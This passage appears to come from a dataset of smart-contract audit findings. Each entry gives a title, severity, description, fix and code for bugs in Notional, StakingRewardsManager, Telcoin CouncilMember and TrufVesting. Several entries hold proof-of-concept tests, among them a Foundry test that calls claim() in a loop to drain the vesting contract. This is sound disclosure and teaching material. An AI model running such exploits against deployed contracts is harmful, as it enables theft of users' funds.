No underflow possible since targetExternalUnderlyingLend\\n // is floored at zero.\\n uint256(underlyingToken.convertToExternal(targetExternalUnderlyingLend)),\\n // maxExternalUnderlyingLend is limit enforced by setting externalWithdrawThreshold\\n // maxExternalDeposit is limit due to the supply cap on external pools\\n SafeUint256.min(maxExternalUnderlyingLend, oracleData.maxExternalDeposit)\\n );\\n```\\n -`wfCashERC4626`чmediumчThe `wfCash` vault is credited less prime cash than the `wfCash` it mints to the depositor when its underlying asset is a fee-on-transfer token. This leads to the vault being insolvent because it has issued more shares than can be redeemed.\\n```\\n if (maxFCash < fCashAmount) {\\n // NOTE: lending at zero\\n uint256 fCashAmountExternal = fCashAmount * precision / uint256(Constants.INTERNAL_TOKEN_PRECISION);\\n require(fCashAmountExternal <= depositAmountExternal);\\n\\n // NOTE: Residual (depositAmountExternal - fCashAmountExternal) will be transferred\\n // back to the account\\n NotionalV2.depositUnderlyingToken{value: msgValue}(address(this), currencyId, fCashAmountExternal);\\n } else if (isETH || hasTransferFee || getCashBalance() > 0) {\\n```\\n\\n```\\n } else {\\n // In the case of deposits, we use a balance before and after check\\n // to ensure that we record the proper balance change.\\n actualTransferExternal = GenericToken.safeTransferIn(\\n underlying.tokenAddress, account, underlyingExternalDeposit\\n ).toInt();\\n }\\n\\n netPrimeSupplyChange = _postTransferPrimeCashUpdate(\\n account, currencyId, actualTransferExternal, underlying, primeRate\\n );\\n```\\n\\n```\\n // Mints ERC20 tokens for the receiver\\n _mint(receiver, fCashAmount);\\n```\\n\\nIn the case of lending at 0% interest, `fCashAmount` is equal to `depositAmount` but at 1e8 precision.\\nTo simplify the example, let us assume that there are no other depositors. 
When the sole depositor redeems all their `wfCash` shares at maturity, they will be unable to redeem all their shares because the `wfCash` vault does not hold enough prime cash.чConsider adding the following:\\nA flag in `wfCashERC4626` that signals that the vault's asset is a fee-on-transfer token.\\nIn `wfCashERC4626._previewMint()` and `wfCashERC46262._previewDeposit`, all calculations related to `assets` should account for the transfer fee of the token.чAlthough the example used to display the vulnerability is for the case of lending at 0% interest, the issue exists for minting any amount of shares.\\nThe `wfCashERC4626` vault will become insolvent and unable to buy back all shares. The larger the total amount deposited, the larger the deficit. The deficit is equal to the transfer fee. Given a total deposit amount of 100M USDT and a transfer fee of 2% (assuming a transfer fee was set and enabled for USDT), 2M USDT will be the deficit.\\nThe last depositors to redeem their shares will be shouldering the loss.ч```\\n if (maxFCash < fCashAmount) {\\n // NOTE: lending at zero\\n uint256 fCashAmountExternal = fCashAmount * precision / uint256(Constants.INTERNAL_TOKEN_PRECISION);\\n require(fCashAmountExternal <= depositAmountExternal);\\n\\n // NOTE: Residual (depositAmountExternal - fCashAmountExternal) will be transferred\\n // back to the account\\n NotionalV2.depositUnderlyingToken{value: msgValue}(address(this), currencyId, fCashAmountExternal);\\n } else if (isETH || hasTransferFee || getCashBalance() > 0) {\\n```\\n -`ExternalLending`чmediumчWhen the Treasury rebalances and has to redeem aTokens from AaveV3, it checks that the actual amount withdrawn is greater than or equal to the set `withdrawAmount`. This check will always fail for fee-on-transfer tokens since the `withdrawAmount` does not account for the transfer fee.\\n```\\n address[] memory targets = new address[](UNDERLYING_IS_ETH ? 2 : 1);\\n bytes[] memory callData = new bytes[](UNDERLYING_IS_ETH ? 
2 : 1);\\n targets[0] = LENDING_POOL;\\n callData[0] = abi.encodeWithSelector(\\n ILendingPool.withdraw.selector, underlyingToken, withdrawAmount, address(NOTIONAL)\\n );\\n\\n if (UNDERLYING_IS_ETH) {\\n // Aave V3 returns WETH instead of native ETH so we have to unwrap it here\\n targets[1] = address(Deployments.WETH);\\n callData[1] = abi.encodeWithSelector(WETH9.withdraw.selector, withdrawAmount);\\n }\\n\\n data = new RedeemData[](1);\\n // Tokens with less than or equal to 8 decimals sometimes have off by 1 issues when depositing\\n // into Aave V3. Aave returns one unit less than has been deposited. This adjustment is applied\\n // to ensure that this unit of token is credited back to prime cash holders appropriately.\\n uint8 rebasingTokenBalanceAdjustment = UNDERLYING_DECIMALS <= 8 ? 1 : 0;\\n data[0] = RedeemData(\\n targets, callData, withdrawAmount, ASSET_TOKEN, rebasingTokenBalanceAdjustment\\n );\\n```\\n\\nNote that the third field in the `RedeemData` struct is the `expectedUnderlying` field which is set to the `withdrawAmount` and that `withdrawAmount` is a value greater than zero.\\n```\\n for (uint256 j; j < data.targets.length; j++) {\\n GenericToken.executeLowLevelCall(data.targets[j], 0, data.callData[j]);\\n }\\n\\n // Ensure that we get sufficient underlying on every redemption\\n uint256 newUnderlyingBalance = TokenHandler.balanceOf(underlyingToken, address(this));\\n uint256 underlyingBalanceChange = newUnderlyingBalance.sub(oldUnderlyingBalance);\\n // If the call is not the final redemption, then expectedUnderlying should\\n // be set to zero.\\n require(data.expectedUnderlying <= underlyingBalanceChange);\\n```\\n\\n```\\nredeemAmounts[0] = currentAmount - targetAmount;\\n```\\n\\nIt does not account for transfer fees. In effect, that check will always revert when the underlying being withdrawn is a fee-on-transfer token.чWhen computing for the `withdrawAmount / data.expectedUnderlying`, it should account for the transfer fees. 
The pseudocode for the computation may look like so:\\n```\\nwithdrawAmount = currentAmount - targetAmount\\nif (underlyingToken.hasTransferFee) {\\n withdrawAmount = withdrawAmount / (100% - underlyingToken.transferFeePercent)\\n}\\n```\\nч```\\n uint256 withdrawAmount = uint256(netTransferExternal.neg());\\n ExternalLending.redeemMoneyMarketIfRequired(currencyId, underlying, withdrawAmount);\\n```\\n\\nThis means that these tokens can only be deposited into AaveV3 but can never redeemed. This can lead to insolvency of the protocol.ч```\\n address[] memory targets = new address[](UNDERLYING_IS_ETH ? 2 : 1);\\n bytes[] memory callData = new bytes[](UNDERLYING_IS_ETH ? 2 : 1);\\n targets[0] = LENDING_POOL;\\n callData[0] = abi.encodeWithSelector(\\n ILendingPool.withdraw.selector, underlyingToken, withdrawAmount, address(NOTIONAL)\\n );\\n\\n if (UNDERLYING_IS_ETH) {\\n // Aave V3 returns WETH instead of native ETH so we have to unwrap it here\\n targets[1] = address(Deployments.WETH);\\n callData[1] = abi.encodeWithSelector(WETH9.withdraw.selector, withdrawAmount);\\n }\\n\\n data = new RedeemData[](1);\\n // Tokens with less than or equal to 8 decimals sometimes have off by 1 issues when depositing\\n // into Aave V3. Aave returns one unit less than has been deposited. This adjustment is applied\\n // to ensure that this unit of token is credited back to prime cash holders appropriately.\\n uint8 rebasingTokenBalanceAdjustment = UNDERLYING_DECIMALS <= 8 ? 
1 : 0;\\n data[0] = RedeemData(\\n targets, callData, withdrawAmount, ASSET_TOKEN, rebasingTokenBalanceAdjustment\\n );\\n```\\n -`StakingRewardsManager::topUp(...)` Misallocates Funds to `StakingRewards` ContractsчhighчThe `StakingRewardsManager::topUp(...)` contract exhibits an issue where the specified `StakingRewards` contracts are not topped up at the correct indices, resulting in an incorrect distribution to different contracts.\\nThe `StakingRewardsManager::topUp(...)` function is designed to top up multiple `StakingRewards` contracts simultaneously by taking the indices of the contract's addresses in the `StakingRewardsManager::stakingContracts` array. However, the flaw lies in the distribution process:\\n```\\n function topUp(\\n address source,\\n uint256[] memory indices\\n ) external onlyRole(EXECUTOR_ROLE) {\\n for (uint i = 0; i < indices.length; i++) {\\n // get staking contract and config\\n StakingRewards staking = stakingContracts[i];\\n StakingConfig memory config = stakingConfigs[staking];\\n\\n // will revert if block.timestamp <= periodFinish\\n staking.setRewardsDuration(config.rewardsDuration);\\n\\n // pull tokens from owner of this contract to fund the staking contract\\n rewardToken.transferFrom(\\n source,\\n address(staking),\\n config.rewardAmount\\n );\\n\\n // start periods\\n staking.notifyRewardAmount(config.rewardAmount);\\n\\n emit ToppedUp(staking, config);\\n }\\n }\\n```\\n\\nGitHub: [254-278]\\nThe rewards are not appropriately distributed to the `StakingRewards` contracts at the specified indices. Instead, they are transferred to the contracts at the loop indices. 
For instance, if intending to top up contracts at indices `[1, 2]`, the actual top-up occurs at indices `[0, 1]`.чIt is recommended to do the following changes:\\n```\\n function topUp(\\n address source,\\n uint256[] memory indices\\n ) external onlyRole(EXECUTOR_ROLE) {\\n for (uint i = 0; i < indices.length; i// Add the line below\\n// Add the line below\\n) {\\n // get staking contract and config\\n// Remove the line below\\n StakingRewards staking = stakingContracts[i];\\n// Add the line below\\n StakingRewards staking = stakingContracts[indices[i]];\\n StakingConfig memory config = stakingConfigs[staking];\\n\\n // will revert if block.timestamp <= periodFinish\\n staking.setRewardsDuration(config.rewardsDuration);\\n\\n // pull tokens from owner of this contract to fund the staking contract\\n rewardToken.transferFrom(\\n source,\\n address(staking),\\n config.rewardAmount\\n );\\n\\n // start periods\\n staking.notifyRewardAmount(config.rewardAmount);\\n\\n emit ToppedUp(staking, config);\\n }\\n }\\n```\\nчThe consequence of this vulnerability is that rewards will be distributed to the incorrect staking contract, leading to potential misallocation and unintended outcomesч```\\n function topUp(\\n address source,\\n uint256[] memory indices\\n ) external onlyRole(EXECUTOR_ROLE) {\\n for (uint i = 0; i < indices.length; i++) {\\n // get staking contract and config\\n StakingRewards staking = stakingContracts[i];\\n StakingConfig memory config = stakingConfigs[staking];\\n\\n // will revert if block.timestamp <= periodFinish\\n staking.setRewardsDuration(config.rewardsDuration);\\n\\n // pull tokens from owner of this contract to fund the staking contract\\n rewardToken.transferFrom(\\n source,\\n address(staking),\\n config.rewardAmount\\n );\\n\\n // start periods\\n staking.notifyRewardAmount(config.rewardAmount);\\n\\n emit ToppedUp(staking, config);\\n }\\n }\\n```\\n -Wrong parameter when retrieving causes a complete DoS of the protocolчhighчA wrong 
parameter in the `_retrieve()` prevents the protocol from properly interacting with Sablier, causing a Denial of Service in all functions calling `_retrieve()`.\\nThe `CouncilMember` contract is designed to interact with a Sablier stream. As time passes, the Sablier stream will unlock more TELCOIN tokens which will be available to be retrieved from `CouncilMember`.\\nThe `_retrieve()` internal function will be used in order to fetch the rewards from the stream and distribute them among the Council Member NFT holders (snippet reduced for simplicity):\\n```\\n// CouncilMember.sol\\n\\nfunction _retrieve() internal {\\n // rest of code\\n // Execute the withdrawal from the _target, which might be a Sablier stream or another protocol\\n _stream.execute(\\n _target,\\n abi.encodeWithSelector(\\n ISablierV2ProxyTarget.withdrawMax.selector, \\n _target, \\n _id,\\n address(this)\\n )\\n );\\n\\n // rest of code\\n }\\n```\\n\\nThe most important part in `_retrieve()` regarding the vulnerability that we'll dive into is the `_stream.execute()` interaction and the params it receives. In order to understand such interaction, we first need understand the importance of the `_stream` and the `_target` variables.\\nSablier allows developers to integrate Sablier via Periphery contracts, which prevents devs from dealing with the complexity of directly integrating Sablier's Core contracts. Telcoin developers have decided to use these periphery contracts. Concretely, the following contracts have been used:\\nNOTE: It is important to understand that the actual lockup linear stream will be deployed as well. The difference is that the Telcoin protocol will not interact with that contract directly. Instead, the PRBProxy and proxy target contracts will be leveraged to perform such interactions.\\nKnowing this, we can now move on to explaining Telcoin's approach to withdrawing the available tokens from the stream. 
As seen in the code snippet above, the `_retrieve()` function will perform two steps to actually perform a withdraw from the stream:\\nIt will first call the _stream's `execute()` function (remember `_stream` is a PRBProxy). This function receives a `target` and some `data` as parameter, and performs a delegatecall aiming at the target:\\nIn the `_retrieve()` function, the target where the call will be forwarded to is the `_target` parameter, which is a ProxyTarget contract. Concretely, the delegatecall function that will be triggered in the ProxyTarget will be withdrawMax():\\nAs we can see, the `withdrawMax()` function has as parameters the `lockup` stream contract `to` withdraw from, the `streamId` and the address `to` which will receive the available funds from the stream. The vulnerability lies in the parameters passed when calling the `withdrawMax()` function in `_retrieve()`. As we can see, the first encoded parameter in the `encodeWithSelector()` call after the selector is the _target:\\n```\\n// CouncilMember.sol\\n\\nfunction _retrieve() internal {\\n // rest of code\\n // Execute the withdrawal from the _target, which might be a Sablier stream or another protocol\\n _stream.execute(\\n _target,\\n abi.encodeWithSelector(\\n ISablierV2ProxyTarget.withdrawMax.selector, \\n _target, // <------- This is incorrect\\n _id,\\n address(this)\\n )\\n );\\n\\n // rest of code\\n }\\n```\\n\\nThis means that the proxy target's `withdrawMax()` function will be triggered with the `_target` contract as the `lockup` parameter, which is incorrect. 
This will make all calls eventually execute `withdrawMax()` on the PRBProxy contract, always reverting.\\nThe parameter needed to perform the `withdrawMax()` call correctly is the actual Sablier lockup contract, which is currently not stored in the `CouncilMember` contract.\\nThe following diagram also summarizes the current wrong interactions for clarity:чIn order to fix the vulnerability, the proper address needs to be passed when calling `withdrawMax()`.\\nNote that the actual stream address is currently NOT stored in `CouncilMember.sol`, so it will need to be stored (my example shows a new `actualStream` variable)\\n```\\nfunction _retrieve() internal {\\n // rest of code\\n // Execute the withdrawal from the _target, which might be a Sablier stream or another protocol\\n _stream.execute(\\n _target,\\n abi.encodeWithSelector(\\n ISablierV2ProxyTarget.withdrawMax.selector, \\n// Remove the line below\\n _target, \\n// Add the line below\\n actualStream\\n _id,\\n address(this)\\n )\\n );\\n\\n // rest of code\\n }\\n```\\nчHigh. ALL withdrawals from the Sablier stream will revert, effectively causing a DoS in the _retrieve() function. 
Because the _retrieve() function is called in all the main protocol functions, this vulnerability essentially prevents the protocol from ever functioning correctly.\\nProof of Concept\\n```\\n// SPDX-License-Identifier: UNLICENSED\\npragma solidity ^0.8.13;\\n\\nimport {Test, console2} from \"forge-std/Test.sol\";\\nimport {SablierV2Comptroller} from \"@sablier/v2-core/src/SablierV2Comptroller.sol\";\\nimport {SablierV2NFTDescriptor} from \"@sablier/v2-core/src/SablierV2NFTDescriptor.sol\";\\nimport {SablierV2LockupLinear} from \"@sablier/v2-core/src/SablierV2LockupLinear.sol\";\\nimport {ISablierV2Comptroller} from \"@sablier/v2-core/src/interfaces/ISablierV2Comptroller.sol\";\\nimport {ISablierV2NFTDescriptor} from \"@sablier/v2-core/src/interfaces/ISablierV2NFTDescriptor.sol\";\\nimport {ISablierV2LockupLinear} from \"@sablier/v2-core/src/interfaces/ISablierV2LockupLinear.sol\";\\n\\nimport {CouncilMember, IPRBProxy} from \"../src/core/CouncilMember.sol\";\\nimport {TestTelcoin} from \"./mock/TestTelcoin.sol\";\\nimport {MockProxyTarget} from \"./mock/MockProxyTarget.sol\";\\nimport {PRBProxy} from \"./mock/MockPRBProxy.sol\";\\nimport {PRBProxyRegistry} from \"./mock/MockPRBProxyRegistry.sol\";\\n\\nimport {UD60x18} from \"@prb/math/src/UD60x18.sol\";\\nimport {LockupLinear, Broker, IERC20} from \"@sablier/v2-core/src/types/DataTypes.sol\";\\nimport {IERC20 as IERC20OZ} from \"@openzeppelin/contracts/token/ERC20/IERC20.sol\";\\n\\ncontract PocTest is Test {\\n\\n ////////////////////////////////////////////////////////////////\\n // CONSTANTS //\\n ////////////////////////////////////////////////////////////////\\n\\n bytes32 public constant GOVERNANCE_COUNCIL_ROLE =\\n keccak256(\"GOVERNANCE_COUNCIL_ROLE\");\\n bytes32 public constant SUPPORT_ROLE = keccak256(\"SUPPORT_ROLE\");\\n\\n ////////////////////////////////////////////////////////////////\\n // STORAGE //\\n ////////////////////////////////////////////////////////////////\\n\\n /// @notice Poc 
Users\\n address public sablierAdmin;\\n address public user;\\n\\n /// @notice Sablier contracts\\n SablierV2Comptroller public comptroller;\\n SablierV2NFTDescriptor public nftDescriptor;\\n SablierV2LockupLinear public lockupLinear;\\n\\n /// @notice Telcoin contracts\\n PRBProxyRegistry public proxyRegistry;\\n PRBProxy public stream;\\n MockProxyTarget public target;\\n CouncilMember public councilMember;\\n TestTelcoin public telcoin;\\n\\n function setUp() public {\\n // Setup users\\n _setupUsers();\\n\\n // Deploy token\\n telcoin = new TestTelcoin(address(this));\\n\\n // Deploy Sablier \\n _deploySablier();\\n\\n // Deploy council member\\n councilMember = new CouncilMember();\\n\\n // Setup stream\\n _setupStream();\\n\\n // Setup the council member\\n _setupCouncilMember();\\n }\\n\\n function testPoc() public {\\n // Step 1: Mint council NFT to user\\n councilMember.mint(user);\\n assertEq(councilMember.balanceOf(user), 1);\\n\\n // Step 2: Forward time 1 days\\n vm.warp(block.timestamp + 1 days);\\n \\n // Step 3: All functions calling _retrieve() (mint(), burn(), removeFromOffice()) will fail\\n vm.expectRevert(abi.encodeWithSignature(\"PRBProxy_ExecutionReverted()\")); \\n councilMember.mint(user);\\n }\\n\\n function _setupUsers() internal {\\n sablierAdmin = makeAddr(\"sablierAdmin\");\\n user = makeAddr(\"user\");\\n }\\n\\n function _deploySablier() internal {\\n // Deploy protocol\\n comptroller = new SablierV2Comptroller(sablierAdmin);\\n nftDescriptor = new SablierV2NFTDescriptor();\\n lockupLinear = new SablierV2LockupLinear(\\n sablierAdmin,\\n ISablierV2Comptroller(address(comptroller)),\\n ISablierV2NFTDescriptor(address(nftDescriptor))\\n );\\n }\\n\\n function _setupStream() internal {\\n\\n // Deploy proxies\\n proxyRegistry = new PRBProxyRegistry();\\n stream = PRBProxy(payable(address(proxyRegistry.deploy())));\\n target = new MockProxyTarget();\\n\\n // Setup stream\\n LockupLinear.Durations memory durations = 
LockupLinear.Durations({\\n cliff: 0,\\n total: 1 weeks\\n });\\n\\n UD60x18 fee = UD60x18.wrap(0);\\n\\n Broker memory broker = Broker({account: address(0), fee: fee});\\n LockupLinear.CreateWithDurations memory params = LockupLinear\\n .CreateWithDurations({\\n sender: address(this),\\n recipient: address(stream),\\n totalAmount: 100e18,\\n asset: IERC20(address(telcoin)),\\n cancelable: false,\\n transferable: false,\\n durations: durations,\\n broker: broker\\n });\\n\\n bytes memory data = abi.encodeWithSelector(target.createWithDurations.selector, address(lockupLinear), params, \"\");\\n\\n // Create the stream through the PRBProxy\\n telcoin.approve(address(stream), type(uint256).max);\\n bytes memory response = stream.execute(address(target), data);\\n assertEq(lockupLinear.ownerOf(1), address(stream));\\n }\\n\\n function _setupCouncilMember() internal {\\n // Initialize\\n councilMember.initialize(\\n IERC20OZ(address(telcoin)),\\n \"Test Council\",\\n \"TC\",\\n IPRBProxy(address(stream)), // stream_\\n address(target), // target_\\n 1, // id_\\n address(lockupLinear)\\n );\\n\\n // Grant roles\\n councilMember.grantRole(GOVERNANCE_COUNCIL_ROLE, address(this));\\n councilMember.grantRole(SUPPORT_ROLE, address(this));\\n }\\n \\n}\\n```\\nч```\\n// CouncilMember.sol\\n\\nfunction _retrieve() internal {\\n // rest of code\\n // Execute the withdrawal from the _target, which might be a Sablier stream or another protocol\\n _stream.execute(\\n _target,\\n abi.encodeWithSelector(\\n ISablierV2ProxyTarget.withdrawMax.selector, \\n _target, \\n _id,\\n address(this)\\n )\\n );\\n\\n // rest of code\\n }\\n```\\n -CouncilMember:burn renders the contract inoperable after the first executionчhighчThe CouncilMember contract suffers from a critical vulnerability that misaligns the balances array after a successful burn, rendering the contract inoperable.\\nThe root cause of the vulnerability is that the `burn` function incorrectly manages the `balances` array, 
shortening it by one each time an ERC721 token is burned while the latest minted NFT still withholds its unique `tokenId` which maps to the previous value of `balances.length`.\\n```\\n// File: telcoin-audit/contracts/sablier/core/CouncilMember.sol\\n function burn(\\n // rest of code\\n balances.pop(); // <= FOUND: balances.length decreases, while latest minted nft withold its unique tokenId\\n _burn(tokenId);\\n }\\n```\\n\\nThis misalignment between existing `tokenIds` and the `balances` array results in several critical impacts:\\nHolders with `tokenId` greater than the length of balances cannot claim.\\nSubsequent burns of `tokenId` greater than balances length will revert.\\nSubsequent mint operations will revert due to `tokenId` collision. As `totalSupply` now collides with the existing `tokenId`.\\n```\\n// File: telcoin-audit/contracts/sablier/core/CouncilMember.sol\\n function mint(\\n // rest of code\\n balances.push(0);\\n _mint(newMember, totalSupply());// <= FOUND\\n }\\n```\\n\\nThis mismanagement creates a cascading effect, collectively rendering the contract inoperable. 
Following POC will demonstrate the issue more clearly in codes.\\nPOC\\nRun `git apply` on the following patch then run `npx hardhat test` to run the POC.\\n```\\ndiff --git a/telcoin-audit/test/sablier/CouncilMember.test.ts b/telcoin-audit/test/sablier/CouncilMember.test.ts\\nindex 675b89d..ab96b08 100644\\n--- a/telcoin-audit/test/sablier/CouncilMember.test.ts\\n+++ b/telcoin-audit/test/sablier/CouncilMember.test.ts\\n@@ -1,13 +1,14 @@\\n import { expect } from \"chai\";\\n import { ethers } from \"hardhat\";\\n import { SignerWithAddress } from \"@nomicfoundation/hardhat-ethers/signers\";\\n-import { CouncilMember, TestTelcoin, TestStream } from \"../../typechain-types\";\\n+import { CouncilMember, TestTelcoin, TestStream, ERC721Upgradeable__factory } from \"../../typechain-types\";\\n \\n describe(\"CouncilMember\", () => {\\n let admin: SignerWithAddress;\\n let support: SignerWithAddress;\\n let member: SignerWithAddress;\\n let holder: SignerWithAddress;\\n+ let lastCouncilMember: SignerWithAddress;\\n let councilMember: CouncilMember;\\n let telcoin: TestTelcoin;\\n let stream: TestStream;\\n@@ -18,7 +19,7 @@ describe(\"CouncilMember\", () => {\\n let supportRole: string = ethers.keccak256(ethers.toUtf8Bytes(\"SUPPORT_ROLE\"));\\n \\n beforeEach(async () => {\\n- [admin, support, member, holder, target] = await ethers.getSigners();\\n+ [admin, support, member, holder, target, lastCouncilMember] = await ethers.getSigners();\\n \\n const TestTelcoinFactory = await ethers.getContractFactory(\"TestTelcoin\", admin);\\n telcoin = await TestTelcoinFactory.deploy(admin.address);\\n@@ -182,6 +183,22 @@ describe(\"CouncilMember\", () => {\\n it(\"the correct removal is made\", async () => {\\n await expect(councilMember.burn(1, support.address)).emit(councilMember, \"Transfer\");\\n });\\n+ it.only(\"inoperable contract after burn\", async () => {\\n+ await expect(councilMember.mint(lastCouncilMember.address)).to.not.reverted;\\n+\\n+ // This 1st burn will cause 
contract inoperable due to tokenId & balances misalignment\\n+ await expect(councilMember.burn(1, support.address)).emit(councilMember, \"Transfer\");\\n+\\n+ // Impact 1. holder with tokenId > balances length cannot claim\\n+ await expect(councilMember.connect(lastCouncilMember).claim(3, 1)).to.revertedWithPanic(\"0x32\"); // @audit-info 0x32: Array accessed at an out-of-bounds or negative index\\n+\\n+ // Impact 2. subsequent burns of tokenId > balances length will revert\\n+ await expect(councilMember.burn(3, lastCouncilMember.address)).to.revertedWithPanic(\"0x32\"); \\n+\\n+ // Impact 3. subsequent mint will revert due to tokenId collision\\n+ await expect(councilMember.mint(lastCouncilMember.address)).to.revertedWithCustomError(councilMember, \"ERC721InvalidSender\");\\n+\\n+ });\\n });\\n });\\n \\n```\\n\\nResult\\nCouncilMember mutative burn Success ✔ inoperable contract after burn (90ms) 1 passing (888ms)\\nThe Passing execution of the POC confirmed that operations such as `claim`, `burn` & `mint` were all reverted which make the contract inoperable.чIt is recommended to avoid popping out balances to keep alignment with uniquely minted tokenId. 
Alternatively, consider migrating to ERC1155, which inherently manages a built-in balance for each NFT.чThe severity of the vulnerability is high due to the high likelihood of occurrence and the critical impacts on the contract's operability and token holders' ability to interact with their assets.ч```\\n// File: telcoin-audit/contracts/sablier/core/CouncilMember.sol\\n function burn(\\n // rest of code\\n balances.pop(); // <= FOUND: balances.length decreases, while latest minted nft withholds its unique tokenId\\n _burn(tokenId);\\n }\\n```\\n -Users can fully drain the `TrufVesting` contractчhighчDue to a flaw in the logic in `claimable`, any arbitrary user can drain all the funds within the contract.\\nA user's claimable is calculated in the following way:\\nUp until start time it is 0.\\nBetween start time and cliff time it's equal to `initialRelease`.\\nAfter cliff time, it linearly increases until the full period ends.\\nHowever, if we look at the code, when we are at stage 2., it always returns `initialRelease`, even if we've already claimed it. This would allow for any arbitrary user to call claim as many times as they wish and every time they'd receive `initialRelease`. 
Given enough iterations, any user can drain the contract.\\n```\\n function claimable(uint256 categoryId, uint256 vestingId, address user)\\n public\\n view\\n returns (uint256 claimableAmount)\\n {\\n UserVesting memory userVesting = userVestings[categoryId][vestingId][user];\\n\\n VestingInfo memory info = vestingInfos[categoryId][vestingId];\\n\\n uint64 startTime = userVesting.startTime + info.initialReleasePeriod;\\n\\n if (startTime > block.timestamp) {\\n return 0;\\n }\\n\\n uint256 totalAmount = userVesting.amount;\\n\\n uint256 initialRelease = (totalAmount * info.initialReleasePct) / DENOMINATOR;\\n\\n startTime += info.cliff;\\n\\n if (startTime > block.timestamp) {\\n return initialRelease;\\n }\\n```\\n\\n```\\n function claim(address user, uint256 categoryId, uint256 vestingId, uint256 claimAmount) public {\\n if (user != msg.sender && (!categories[categoryId].adminClaimable || msg.sender != owner())) {\\n revert Forbidden(msg.sender);\\n }\\n\\n uint256 claimableAmount = claimable(categoryId, vestingId, user);\\n if (claimAmount == type(uint256).max) {\\n claimAmount = claimableAmount;\\n } else if (claimAmount > claimableAmount) {\\n revert ClaimAmountExceed();\\n }\\n if (claimAmount == 0) {\\n revert ZeroAmount();\\n }\\n\\n categories[categoryId].totalClaimed += claimAmount;\\n userVestings[categoryId][vestingId][user].claimed += claimAmount;\\n trufToken.safeTransfer(user, claimAmount);\\n\\n emit Claimed(categoryId, vestingId, user, claimAmount);\\n }\\n```\\nчchange the if check to the following\\n```\\n if (startTime > block.timestamp) {\\n if (initialRelease > userVesting.claimed) {\\n return initialRelease - userVesting.claimed;\\n }\\n else { return 0; } \\n }\\n```\\n\\nPoC\\n```\\n function test_cliffVestingDrain() public { \\n _setupVestingPlan();\\n uint256 categoryId = 2;\\n uint256 vestingId = 0;\\n uint256 stakeAmount = 10e18;\\n uint256 duration = 30 days;\\n\\n vm.startPrank(owner);\\n \\n vesting.setUserVesting(categoryId, 
vestingId, alice, 0, stakeAmount);\\n\\n vm.warp(block.timestamp + 11 days); // warping 11 days, because initial release period is 10 days\\n // and cliff is at 20 days. We need to be in the middle \\n vm.startPrank(alice);\\n assertEq(trufToken.balanceOf(alice), 0);\\n vesting.claim(alice, categoryId, vestingId, type(uint256).max);\\n \\n uint256 balance = trufToken.balanceOf(alice);\\n assertEq(balance, stakeAmount * 5 / 100); // Alice should be able to have claimed just 5% of the vesting \\n\\n for (uint i; i < 39; i++ ){ \\n vesting.claim(alice, categoryId, vestingId, type(uint256).max);\\n }\\n uint256 newBalance = trufToken.balanceOf(alice); // Alice has claimed 2x the amount she was supposed to be vested. \\n assertEq(newBalance, stakeAmount * 2); // In fact she can keep on doing this to drain the whole contract\\n }\\n```\\nчAny user can drain the contractч```\\n function claimable(uint256 categoryId, uint256 vestingId, address user)\\n public\\n view\\n returns (uint256 claimableAmount)\\n {\\n UserVesting memory userVesting = userVestings[categoryId][vestingId][user];\\n\\n VestingInfo memory info = vestingInfos[categoryId][vestingId];\\n\\n uint64 startTime = userVesting.startTime + info.initialReleasePeriod;\\n\\n if (startTime > block.timestamp) {\\n return 0;\\n }\\n\\n uint256 totalAmount = userVesting.amount;\\n\\n uint256 initialRelease = (totalAmount * info.initialReleasePct) / DENOMINATOR;\\n\\n startTime += info.cliff;\\n\\n if (startTime > block.timestamp) {\\n return initialRelease;\\n }\\n```\\n -`cancelVesting` will potentially not give users unclaimed, vested funds, even if giveUnclaimed = trueчhighчThe purpose of `cancelVesting` is to cancel a vesting grant and potentially give users unclaimed but vested funds in the event that `giveUnclaimed = true`. 
However, due to a bug, in the event that the user had staked / locked funds, they will potentially not received the unclaimed / vested funds even if `giveUnclaimed = true`.\\nHere's the cancelVesting function in TrufVesting:\\n```\\nfunction cancelVesting(uint256 categoryId, uint256 vestingId, address user, bool giveUnclaimed)\\n external\\n onlyOwner\\n{\\n UserVesting memory userVesting = userVestings[categoryId][vestingId][user];\\n\\n if (userVesting.amount == 0) {\\n revert UserVestingDoesNotExists(categoryId, vestingId, user);\\n }\\n\\n if (userVesting.startTime + vestingInfos[categoryId][vestingId].period <= block.timestamp) {\\n revert AlreadyVested(categoryId, vestingId, user);\\n }\\n\\n uint256 lockupId = lockupIds[categoryId][vestingId][user];\\n\\n if (lockupId != 0) {\\n veTRUF.unstakeVesting(user, lockupId - 1, true);\\n delete lockupIds[categoryId][vestingId][user];\\n userVesting.locked = 0;\\n }\\n\\n VestingCategory storage category = categories[categoryId];\\n\\n uint256 claimableAmount = claimable(categoryId, vestingId, user);\\n if (giveUnclaimed && claimableAmount != 0) {\\n trufToken.safeTransfer(user, claimableAmount);\\n\\n userVesting.claimed += claimableAmount;\\n category.totalClaimed += claimableAmount;\\n emit Claimed(categoryId, vestingId, user, claimableAmount);\\n }\\n\\n uint256 unvested = userVesting.amount - userVesting.claimed;\\n\\n delete userVestings[categoryId][vestingId][user];\\n\\n category.allocated -= unvested;\\n\\n emit CancelVesting(categoryId, vestingId, user, giveUnclaimed);\\n}\\n```\\n\\nFirst, consider the following code:\\n```\\nuint256 lockupId = lockupIds[categoryId][vestingId][user];\\n\\nif (lockupId != 0) {\\n veTRUF.unstakeVesting(user, lockupId - 1, true);\\n delete lockupIds[categoryId][vestingId][user];\\n userVesting.locked = 0;\\n}\\n```\\n\\nFirst the locked / staked funds will essentially be un-staked. 
The following line of code: `userVesting.locked = 0;` exists because there is a call to `uint256 claimableAmount = claimable(categoryId, vestingId, user);` afterwards, and in the event that there were locked funds that were unstaked, these funds should now potentially be `claimable` if they are vested (but if locked is not set to 0, then the vested funds will potentially not be deemed `claimable` by the `claimable` function).\\nHowever, because `userVesting` is `memory` rather than `storage`, this doesn't end up happening (so `userVesting.locked = 0;` is actually a bug). This means that if a user is currently staking all their funds (so all their funds are locked), and `cancelVesting` is called, then they will not receive any funds back even if `giveUnclaimed = true`. This is because the `claimable` function (which will access the unaltered userVestings[categoryId][vestingId][user]) will still think that all the funds are currently locked, even though they are not as they have been forcibly unstaked.чChange `userVesting.locked = 0;` to `userVestings[categoryId][vestingId][user].locked = 0;`чWhen `cancelVesting` is called, a user may not receive their unclaimed, vested funds.ч```\\nfunction cancelVesting(uint256 categoryId, uint256 vestingId, address user, bool giveUnclaimed)\\n external\\n onlyOwner\\n{\\n UserVesting memory userVesting = userVestings[categoryId][vestingId][user];\\n\\n if (userVesting.amount == 0) {\\n revert UserVestingDoesNotExists(categoryId, vestingId, user);\\n }\\n\\n if 